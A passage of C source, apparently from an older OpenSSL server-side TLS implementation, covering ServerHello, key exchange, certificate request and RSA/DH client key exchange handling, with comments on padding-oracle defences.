goto err;
}
/* Let cert callback update server certificates if required */
retry_cert:
if (s->cert->cert_cb)
{
int rv = s->cert->cert_cb(s, s->cert->cert_cb_arg);
if (rv == 0)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_CERT_CB_ERROR);
goto f_err;
}
if (rv < 0)
{
s->rwstate=SSL_X509_LOOKUP;
return -1;
}
s->rwstate = SSL_NOTHING;
}
c=ssl3_choose_cipher(s,s->session->ciphers,
SSL_get_ciphers(s));
if (c == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_SHARED_CIPHER);
goto f_err;
}
s->s3->tmp.new_cipher=c;
/* check whether we should disable session resumption */
if (s->not_resumable_session_cb != NULL)
s->session->not_resumable=s->not_resumable_session_cb(s,
((c->algorithm_mkey & (SSL_kDHE | SSL_kECDHE)) != 0));
if (s->session->not_resumable)
/* do not send a session ticket */
s->tlsext_ticket_expected = 0;
}
else
{
/* Session-id reuse */
#ifdef REUSE_CIPHER_BUG
STACK_OF(SSL_CIPHER) *sk;
SSL_CIPHER *nc=NULL;
SSL_CIPHER *ec=NULL;
if (s->options & SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG)
{
sk=s->session->ciphers;
for (i=0; i<sk_SSL_CIPHER_num(sk); i++)
{
c=sk_SSL_CIPHER_value(sk,i);
if (c->algorithm_enc & SSL_eNULL)
nc=c;
if (SSL_C_IS_EXPORT(c))
ec=c;
}
if (nc != NULL)
s->s3->tmp.new_cipher=nc;
else if (ec != NULL)
s->s3->tmp.new_cipher=ec;
else
s->s3->tmp.new_cipher=s->session->cipher;
}
else
#endif
s->s3->tmp.new_cipher=s->session->cipher;
}
if (!SSL_USE_SIGALGS(s) || !(s->verify_mode & SSL_VERIFY_PEER))
{
if (!ssl3_digest_cached_records(s))
goto f_err;
}
/*-
* we now have the following setup.
* client_random
* cipher_list - our prefered list of ciphers
* ciphers - the clients prefered list of ciphers
* compression - basically ignored right now
* ssl version is set - sslv3
* s->session - The ssl session has been setup.
* s->hit - session reuse flag
* s->s3->tmp.new_cipher- the new cipher to use.
*/
/* Handles TLS extensions that we couldn't check earlier */
if (s->version >= SSL3_VERSION)
{
if (ssl_check_clienthello_tlsext_late(s) <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
goto err;
}
}
if (ret < 0) ret=-ret;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
if (ciphers != NULL) sk_SSL_CIPHER_free(ciphers);
return ret < 0 ? -1 : ret;
}
int ssl3_send_server_hello(SSL *s)
{
unsigned char *buf;
unsigned char *p,*d;
int i,sl;
int al = 0;
unsigned long l;
if (s->state == SSL3_ST_SW_SRVR_HELLO_A)
{
buf=(unsigned char *)s->init_buf->data;
#ifdef OPENSSL_NO_TLSEXT
p=s->s3->server_random;
if (ssl_fill_hello_random(s, 1, p, SSL3_RANDOM_SIZE) <= 0)
return -1;
#endif
/* Do the message type and length last */
d=p= ssl_handshake_start(s);
*(p++)=s->version>>8;
*(p++)=s->version&0xff;
/* Random stuff */
memcpy(p,s->s3->server_random,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/*-
* There are several cases for the session ID to send
* back in the server hello:
* - For session reuse from the session cache,
* we send back the old session ID.
* - If stateless session reuse (using a session ticket)
* is successful, we send back the client's "session ID"
* (which doesn't actually identify the session).
* - If it is a new session, we send back the new
* session ID.
* - However, if we want the new session to be single-use,
* we send back a 0-length session ID.
* s->hit is non-zero in either case of session reuse,
* so the following won't overwrite an ID that we're supposed
* to send back.
*/
if (s->session->not_resumable ||
(!(s->ctx->session_cache_mode & SSL_SESS_CACHE_SERVER)
&& !s->hit))
s->session->session_id_length=0;
sl=s->session->session_id_length;
if (sl > (int)sizeof(s->session->session_id))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO, ERR_R_INTERNAL_ERROR);
return -1;
}
*(p++)=sl;
memcpy(p,s->session->session_id,sl);
p+=sl;
/* put the cipher */
i=ssl3_put_cipher_by_char(s->s3->tmp.new_cipher,p);
p+=i;
/* put the compression method */
#ifdef OPENSSL_NO_COMP
*(p++)=0;
#else
if (s->s3->tmp.new_compression == NULL)
*(p++)=0;
else
*(p++)=s->s3->tmp.new_compression->id;
#endif
#ifndef OPENSSL_NO_TLSEXT
if (ssl_prepare_serverhello_tlsext(s) <= 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO,SSL_R_SERVERHELLO_TLSEXT);
return -1;
}
if ((p = ssl_add_serverhello_tlsext(s, p, buf+SSL3_RT_MAX_PLAIN_LENGTH, &al)) == NULL)
{
ssl3_send_alert(s, SSL3_AL_FATAL, al);
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO,ERR_R_INTERNAL_ERROR);
return -1;
}
#endif
/* do the header */
l=(p-d);
ssl_set_handshake_header(s, SSL3_MT_SERVER_HELLO, l);
s->state=SSL3_ST_SW_SRVR_HELLO_B;
}
/* SSL3_ST_SW_SRVR_HELLO_B */
return ssl_do_write(s);
}
int ssl3_send_server_done(SSL *s)
{
if (s->state == SSL3_ST_SW_SRVR_DONE_A)
{
ssl_set_handshake_header(s, SSL3_MT_SERVER_DONE, 0);
s->state = SSL3_ST_SW_SRVR_DONE_B;
}
/* SSL3_ST_SW_SRVR_DONE_B */
return ssl_do_write(s);
}
int ssl3_send_server_key_exchange(SSL *s)
{
#ifndef OPENSSL_NO_RSA
unsigned char *q;
int j,num;
RSA *rsa;
unsigned char md_buf[MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH];
unsigned int u;
#endif
#ifndef OPENSSL_NO_DH
DH *dh=NULL,*dhp;
#endif
#ifndef OPENSSL_NO_ECDH
EC_KEY *ecdh=NULL, *ecdhp;
unsigned char *encodedPoint = NULL;
int encodedlen = 0;
int curve_id = 0;
BN_CTX *bn_ctx = NULL;
#endif
EVP_PKEY *pkey;
const EVP_MD *md = NULL;
unsigned char *p,*d;
int al,i;
unsigned long type;
int n;
CERT *cert;
BIGNUM *r[4];
int nr[4],kn;
BUF_MEM *buf;
EVP_MD_CTX md_ctx;
EVP_MD_CTX_init(&md_ctx);
if (s->state == SSL3_ST_SW_KEY_EXCH_A)
{
type=s->s3->tmp.new_cipher->algorithm_mkey;
cert=s->cert;
buf=s->init_buf;
r[0]=r[1]=r[2]=r[3]=NULL;
n=0;
#ifndef OPENSSL_NO_RSA
if (type & SSL_kRSA)
{
rsa=cert->rsa_tmp;
if ((rsa == NULL) && (s->cert->rsa_tmp_cb != NULL))
{
rsa=s->cert->rsa_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
if(rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_ERROR_GENERATING_TMP_RSA_KEY);
goto f_err;
}
RSA_up_ref(rsa);
cert->rsa_tmp=rsa;
}
if (rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_RSA_KEY);
goto f_err;
}
r[0]=rsa->n;
r[1]=rsa->e;
s->s3->tmp.use_rsa_tmp=1;
}
else
#endif
#ifndef OPENSSL_NO_DH
if (type & SSL_kDHE)
{
if (s->cert->dh_tmp_auto)
{
dhp = ssl_get_auto_dh(s);
if (dhp == NULL)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto f_err;
}
}
else
dhp=cert->dh_tmp;
if ((dhp == NULL) && (s->cert->dh_tmp_cb != NULL))
dhp=s->cert->dh_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
if (dhp == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
if (!ssl_security(s, SSL_SECOP_TMP_DH,
DH_security_bits(dhp), 0, dhp))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_DH_KEY_TOO_SMALL);
goto f_err;
}
if (s->s3->tmp.dh != NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
if (s->cert->dh_tmp_auto)
dh = dhp;
else if ((dh=DHparams_dup(dhp)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
s->s3->tmp.dh=dh;
if ((dhp->pub_key == NULL ||
dhp->priv_key == NULL ||
(s->options & SSL_OP_SINGLE_DH_USE)))
{
if(!DH_generate_key(dh))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
ERR_R_DH_LIB);
goto err;
}
}
else
{
dh->pub_key=BN_dup(dhp->pub_key);
dh->priv_key=BN_dup(dhp->priv_key);
if ((dh->pub_key == NULL) ||
(dh->priv_key == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
}
r[0]=dh->p;
r[1]=dh->g;
r[2]=dh->pub_key;
}
else
#endif
#ifndef OPENSSL_NO_ECDH
if (type & SSL_kECDHE)
{
const EC_GROUP *group;
ecdhp=cert->ecdh_tmp;
if (s->cert->ecdh_tmp_auto)
{
/* Get NID of appropriate shared curve */
int nid = tls1_shared_curve(s, -2);
if (nid != NID_undef)
ecdhp = EC_KEY_new_by_curve_name(nid);
}
else if ((ecdhp == NULL) && s->cert->ecdh_tmp_cb)
{
ecdhp=s->cert->ecdh_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
}
if (ecdhp == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_ECDH_KEY);
goto f_err;
}
if (s->s3->tmp.ecdh != NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
/* Duplicate the ECDH structure. */
if (ecdhp == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
if (s->cert->ecdh_tmp_auto)
ecdh = ecdhp;
else if ((ecdh = EC_KEY_dup(ecdhp)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
s->s3->tmp.ecdh=ecdh;
if ((EC_KEY_get0_public_key(ecdh) == NULL) ||
(EC_KEY_get0_private_key(ecdh) == NULL) ||
(s->options & SSL_OP_SINGLE_ECDH_USE))
{
if(!EC_KEY_generate_key(ecdh))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
}
if (((group = EC_KEY_get0_group(ecdh)) == NULL) ||
(EC_KEY_get0_public_key(ecdh) == NULL) ||
(EC_KEY_get0_private_key(ecdh) == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
(EC_GROUP_get_degree(group) > 163))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
goto err;
}
/* XXX: For now, we only support ephemeral ECDH
* keys over named (not generic) curves. For
* supported named curves, curve_id is non-zero.
*/
if ((curve_id =
tls1_ec_nid2curve_id(EC_GROUP_get_curve_name(group)))
== 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNSUPPORTED_ELLIPTIC_CURVE);
goto err;
}
/* Encode the public key.
* First check the size of encoding and
* allocate memory accordingly.
*/
encodedlen = EC_POINT_point2oct(group,
EC_KEY_get0_public_key(ecdh),
POINT_CONVERSION_UNCOMPRESSED,
NULL, 0, NULL);
encodedPoint = (unsigned char *)
OPENSSL_malloc(encodedlen*sizeof(unsigned char));
bn_ctx = BN_CTX_new();
if ((encodedPoint == NULL) || (bn_ctx == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
encodedlen = EC_POINT_point2oct(group,
EC_KEY_get0_public_key(ecdh),
POINT_CONVERSION_UNCOMPRESSED,
encodedPoint, encodedlen, bn_ctx);
if (encodedlen == 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
BN_CTX_free(bn_ctx); bn_ctx=NULL;
/* XXX: For now, we only support named (not
* generic) curves in ECDH ephemeral key exchanges.
* In this situation, we need four additional bytes
* to encode the entire ServerECDHParams
* structure.
*/
n = 4 + encodedlen;
/* We'll generate the serverKeyExchange message
* explicitly so we can set these to NULLs
*/
r[0]=NULL;
r[1]=NULL;
r[2]=NULL;
r[3]=NULL;
}
else
#endif /* !OPENSSL_NO_ECDH */
#ifndef OPENSSL_NO_PSK
if (type & SSL_kPSK)
{
/* reserve size for record length and PSK identity hint*/
n+=2+strlen(s->ctx->psk_identity_hint);
}
else
#endif /* !OPENSSL_NO_PSK */
#ifndef OPENSSL_NO_SRP
if (type & SSL_kSRP)
{
if ((s->srp_ctx.N == NULL) ||
(s->srp_ctx.g == NULL) ||
(s->srp_ctx.s == NULL) ||
(s->srp_ctx.B == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_SRP_PARAM);
goto err;
}
r[0]=s->srp_ctx.N;
r[1]=s->srp_ctx.g;
r[2]=s->srp_ctx.s;
r[3]=s->srp_ctx.B;
}
else
#endif
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE);
goto f_err;
}
for (i=0; i < 4 && r[i] != NULL; i++)
{
nr[i]=BN_num_bytes(r[i]);
#ifndef OPENSSL_NO_SRP
if ((i == 2) && (type & SSL_kSRP))
n+=1+nr[i];
else
#endif
n+=2+nr[i];
}
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
if ((pkey=ssl_get_sign_pkey(s,s->s3->tmp.new_cipher,&md))
== NULL)
{
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
kn=EVP_PKEY_size(pkey);
}
else
{
pkey=NULL;
kn=0;
}
if (!BUF_MEM_grow_clean(buf,n+SSL_HM_HEADER_LENGTH(s)+kn))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_BUF);
goto err;
}
d = p = ssl_handshake_start(s);
for (i=0; i < 4 && r[i] != NULL; i++)
{
#ifndef OPENSSL_NO_SRP
if ((i == 2) && (type & SSL_kSRP))
{
*p = nr[i];
p++;
}
else
#endif
s2n(nr[i],p);
BN_bn2bin(r[i],p);
p+=nr[i];
}
#ifndef OPENSSL_NO_ECDH
if (type & SSL_kECDHE)
{
/* XXX: For now, we only support named (not generic) curves.
* In this situation, the serverKeyExchange message has:
* [1 byte CurveType], [2 byte CurveName]
* [1 byte length of encoded point], followed by
* the actual encoded point itself
*/
*p = NAMED_CURVE_TYPE;
p += 1;
*p = 0;
p += 1;
*p = curve_id;
p += 1;
*p = encodedlen;
p += 1;
memcpy((unsigned char*)p,
(unsigned char *)encodedPoint,
encodedlen);
OPENSSL_free(encodedPoint);
encodedPoint = NULL;
p += encodedlen;
}
#endif
#ifndef OPENSSL_NO_PSK
if (type & SSL_kPSK)
{
/* copy PSK identity hint */
s2n(strlen(s->ctx->psk_identity_hint), p);
strncpy((char *)p, s->ctx->psk_identity_hint, strlen(s->ctx->psk_identity_hint));
p+=strlen(s->ctx->psk_identity_hint);
}
#endif
/* not anonymous */
if (pkey != NULL)
{
/* n is the length of the params, they start at &(d[4])
* and p points to the space at the end. */
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s))
{
q=md_buf;
j=0;
for (num=2; num > 0; num--)
{
EVP_MD_CTX_set_flags(&md_ctx,
EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
EVP_DigestInit_ex(&md_ctx,(num == 2)
?s->ctx->md5:s->ctx->sha1, NULL);
EVP_DigestUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,d,n);
EVP_DigestFinal_ex(&md_ctx,q,
(unsigned int *)&i);
q+=i;
j+=i;
}
if (RSA_sign(NID_md5_sha1, md_buf, j,
&(p[2]), &u, pkey->pkey.rsa) <= 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_RSA);
goto err;
}
s2n(u,p);
n+=u+2;
}
else
#endif
if (md)
{
/* send signature algorithm */
if (SSL_USE_SIGALGS(s))
{
if (!tls12_get_sigandhash(p, pkey, md))
{
/* Should never happen */
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto f_err;
}
p+=2;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using hash %s\n",
EVP_MD_name(md));
#endif
EVP_SignInit_ex(&md_ctx, md, NULL);
EVP_SignUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_SignUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_SignUpdate(&md_ctx,d,n);
if (!EVP_SignFinal(&md_ctx,&(p[2]),
(unsigned int *)&i,pkey))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_EVP);
goto err;
}
s2n(i,p);
n+=i+2;
if (SSL_USE_SIGALGS(s))
n+= 2;
}
else
{
/* Is this error check actually needed? */
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNKNOWN_PKEY_TYPE);
goto f_err;
}
}
ssl_set_handshake_header(s, SSL3_MT_SERVER_KEY_EXCHANGE, n);
}
s->state = SSL3_ST_SW_KEY_EXCH_B;
EVP_MD_CTX_cleanup(&md_ctx);
return ssl_do_write(s);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
#ifndef OPENSSL_NO_ECDH
if (encodedPoint != NULL) OPENSSL_free(encodedPoint);
BN_CTX_free(bn_ctx);
#endif
EVP_MD_CTX_cleanup(&md_ctx);
return(-1);
}
int ssl3_send_certificate_request(SSL *s)
{
unsigned char *p,*d;
int i,j,nl,off,n;
STACK_OF(X509_NAME) *sk=NULL;
X509_NAME *name;
BUF_MEM *buf;
if (s->state == SSL3_ST_SW_CERT_REQ_A)
{
buf=s->init_buf;
d=p=ssl_handshake_start(s);
/* get the list of acceptable cert types */
p++;
n=ssl3_get_req_cert_type(s,p);
d[0]=n;
p+=n;
n++;
if (SSL_USE_SIGALGS(s))
{
const unsigned char *psigs;
unsigned char *etmp = p;
nl = tls12_get_psigalgs(s, &psigs);
/* Skip over length for now */
p += 2;
nl = tls12_copy_sigalgs(s, p, psigs, nl);
/* Now fill in length */
s2n(nl, etmp);
p += nl;
n += nl + 2;
}
off=n;
p+=2;
n+=2;
sk=SSL_get_client_CA_list(s);
nl=0;
if (sk != NULL)
{
for (i=0; i<sk_X509_NAME_num(sk); i++)
{
name=sk_X509_NAME_value(sk,i);
j=i2d_X509_NAME(name,NULL);
if (!BUF_MEM_grow_clean(buf,SSL_HM_HEADER_LENGTH(s)+n+j+2))
{
SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST,ERR_R_BUF_LIB);
goto err;
}
p = ssl_handshake_start(s) + n;
if (!(s->options & SSL_OP_NETSCAPE_CA_DN_BUG))
{
s2n(j,p);
i2d_X509_NAME(name,&p);
n+=2+j;
nl+=2+j;
}
else
{
d=p;
i2d_X509_NAME(name,&p);
j-=2; s2n(j,d); j+=2;
n+=j;
nl+=j;
}
}
}
/* else no CA names */
p = ssl_handshake_start(s) + off;
s2n(nl,p);
ssl_set_handshake_header(s, SSL3_MT_CERTIFICATE_REQUEST, n);
#ifdef NETSCAPE_HANG_BUG
if (!SSL_IS_DTLS(s))
{
if (!BUF_MEM_grow_clean(buf, s->init_num + 4))
{
SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST,ERR_R_BUF_LIB);
goto err;
}
p=(unsigned char *)s->init_buf->data + s->init_num;
/* do the header */
*(p++)=SSL3_MT_SERVER_DONE;
*(p++)=0;
*(p++)=0;
*(p++)=0;
s->init_num += 4;
}
#endif
s->state = SSL3_ST_SW_CERT_REQ_B;
}
/* SSL3_ST_SW_CERT_REQ_B */
return ssl_do_write(s);
err:
return(-1);
}
int ssl3_get_client_key_exchange(SSL *s)
{
int i,al,ok;
long n;
unsigned long alg_k;
unsigned char *p;
#ifndef OPENSSL_NO_RSA
RSA *rsa=NULL;
EVP_PKEY *pkey=NULL;
#endif
#ifndef OPENSSL_NO_DH
BIGNUM *pub=NULL;
DH *dh_srvr, *dh_clnt = NULL;
#endif
#ifndef OPENSSL_NO_KRB5
KSSL_ERR kssl_err;
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
EC_KEY *srvr_ecdh = NULL;
EVP_PKEY *clnt_pub_pkey = NULL;
EC_POINT *clnt_ecpoint = NULL;
BN_CTX *bn_ctx = NULL;
#endif
n=s->method->ssl_get_message(s,
SSL3_ST_SR_KEY_EXCH_A,
SSL3_ST_SR_KEY_EXCH_B,
SSL3_MT_CLIENT_KEY_EXCHANGE,
2048, /* ??? */
&ok);
if (!ok) return((int)n);
p=(unsigned char *)s->init_msg;
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
unsigned char rand_premaster_secret[SSL_MAX_MASTER_KEY_LENGTH];
int decrypt_len;
unsigned char decrypt_good, version_good;
size_t j;
/* FIX THIS UP EAY EAY EAY EAY */
if (s->s3->tmp.use_rsa_tmp)
{
if ((s->cert != NULL) && (s->cert->rsa_tmp != NULL))
rsa=s->cert->rsa_tmp;
/* Don't do a callback because rsa_tmp should
* be sent already */
if (rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_RSA_PKEY);
goto f_err;
}
}
else
{
pkey=s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey;
if ( (pkey == NULL) ||
(pkey->type != EVP_PKEY_RSA) ||
(pkey->pkey.rsa == NULL))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_RSA_CERTIFICATE);
goto f_err;
}
rsa=pkey->pkey.rsa;
}
/* TLS and [incidentally] DTLS{0xFEFF} */
if (s->version > SSL3_VERSION && s->version != DTLS1_BAD_VER)
{
n2s(p,i);
if (n != i+2)
{
if (!(s->options & SSL_OP_TLS_D5_BUG))
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
goto f_err;
}
else
p-=2;
}
else
n=i;
}
/*
* Reject overly short RSA ciphertext because we want to be sure
* that the buffer size makes it safe to iterate over the entire
* size of a premaster secret (SSL_MAX_MASTER_KEY_LENGTH). The
* actual expected size is larger due to RSA padding, but the
* bound is sufficient to be safe.
*/
if (n < SSL_MAX_MASTER_KEY_LENGTH)
{
al = SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
goto f_err;
}
/* We must not leak whether a decryption failure occurs because
* of Bleichenbacher's attack on PKCS #1 v1.5 RSA padding (see
* RFC 2246, section 7.4.7.1). The code follows that advice of
* the TLS RFC and generates a random premaster secret for the
* case that the decrypt fails. See
* https://tools.ietf.org/html/rfc5246#section-7.4.7.1 */
/* should be RAND_bytes, but we cannot work around a failure. */
if (RAND_pseudo_bytes(rand_premaster_secret,
sizeof(rand_premaster_secret)) <= 0)
goto err;
decrypt_len = RSA_private_decrypt((int)n,p,p,rsa,RSA_PKCS1_PADDING);
ERR_clear_error();
/* decrypt_len should be SSL_MAX_MASTER_KEY_LENGTH.
* decrypt_good will be 0xff if so and zero otherwise. */
decrypt_good = constant_time_eq_int_8(decrypt_len, SSL_MAX_MASTER_KEY_LENGTH);
/* If the version in the decrypted pre-master secret is correct
* then version_good will be 0xff, otherwise it'll be zero.
* The Klima-Pokorny-Rosa extension of Bleichenbacher's attack
* (http://eprint.iacr.org/2003/052/) exploits the version
* number check as a "bad version oracle". Thus version checks
* are done in constant time and are treated like any other
* decryption error. */
version_good = constant_time_eq_8(p[0], (unsigned)(s->client_version>>8));
version_good &= constant_time_eq_8(p[1], (unsigned)(s->client_version&0xff));
/* The premaster secret must contain the same version number as
* the ClientHello to detect version rollback attacks
* (strangely, the protocol does not offer such protection for
* DH ciphersuites). However, buggy clients exist that send the
* negotiated protocol version instead if the server does not
* support the requested protocol version. If
* SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such clients. */
if (s->options & SSL_OP_TLS_ROLLBACK_BUG)
{
unsigned char workaround_good;
workaround_good = constant_time_eq_8(p[0], (unsigned)(s->version>>8));
workaround_good &= constant_time_eq_8(p[1], (unsigned)(s->version&0xff));
version_good |= workaround_good;
}
/* Both decryption and version must be good for decrypt_good
* to remain non-zero (0xff). */
decrypt_good &= version_good;
/*
* Now copy rand_premaster_secret over from p using
* decrypt_good_mask. If decryption failed, then p does not
* contain valid plaintext, however, a check above guarantees
* it is still sufficiently large to read from.
*/
for (j = 0; j < sizeof(rand_premaster_secret); j++)
{
p[j] = constant_time_select_8(decrypt_good, p[j],
rand_premaster_secret[j]);
}
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
p,sizeof(rand_premaster_secret));
OPENSSL_cleanse(p,sizeof(rand_premaster_secret));
}
else
#endif
#ifndef OPENSSL_NO_DH
if (alg_k & (SSL_kDHE|SSL_kDHr|SSL_kDHd))
{
int idx = -1;
EVP_PKEY *skey = NULL;
if (n)
n2s(p,i);
else
i = 0;
if (n && n != i+2)
{
if (!(s->options & SSL_OP_SSLEAY_080_CLIENT_DH_BUG))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DH_PUBLIC_VALUE_LENGTH_IS_WRONG);
goto err;
}
else
{
p-=2;
i=(int)n;
}
}
if (alg_k & SSL_kDHr)
idx = SSL_PKEY_DH_RSA;
else if (alg_k & SSL_kDHd)
idx = SSL_PKEY_DH_DSA;
if (idx >= 0)
{
skey = s->cert->pkeys[idx].privatekey;
if ((skey == NULL) ||
(skey->type != EVP_PKEY_DH) ||
(skey->pkey.dh == NULL))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_RSA_CERTIFICATE);
goto f_err;
}
dh_srvr = skey->pkey.dh;
}
else if (s->s3->tmp.dh == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
else
dh_srvr=s->s3->tmp.dh;
if (n == 0L)
{
/* Get pubkey from cert */
EVP_PKEY *clkey=X509_get_pubkey(s->session->peer);
if (clkey)
{
if (EVP_PKEY_cmp_parameters(clkey, skey) == 1)
dh_clnt = EVP_PKEY_get1_DH(clkey);
}
if (dh_clnt == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
EVP_PKEY_free(clkey);
pub = dh_clnt->pub_key;
}
else
pub=BN_bin2bn(p,i,NULL);
if (pub == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BN_LIB);
goto err;
}
i=DH_compute_key(p,pub,dh_srvr);
if (i <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
BN_clear_free(pub);
goto err;
}
DH_free(s->s3->tmp.dh);
s->s3->tmp.dh=NULL;
if (dh_clnt)
DH_free(dh_clnt);
else
BN_clear_free(pub);
pub=NULL;
s->session->master_key_length=
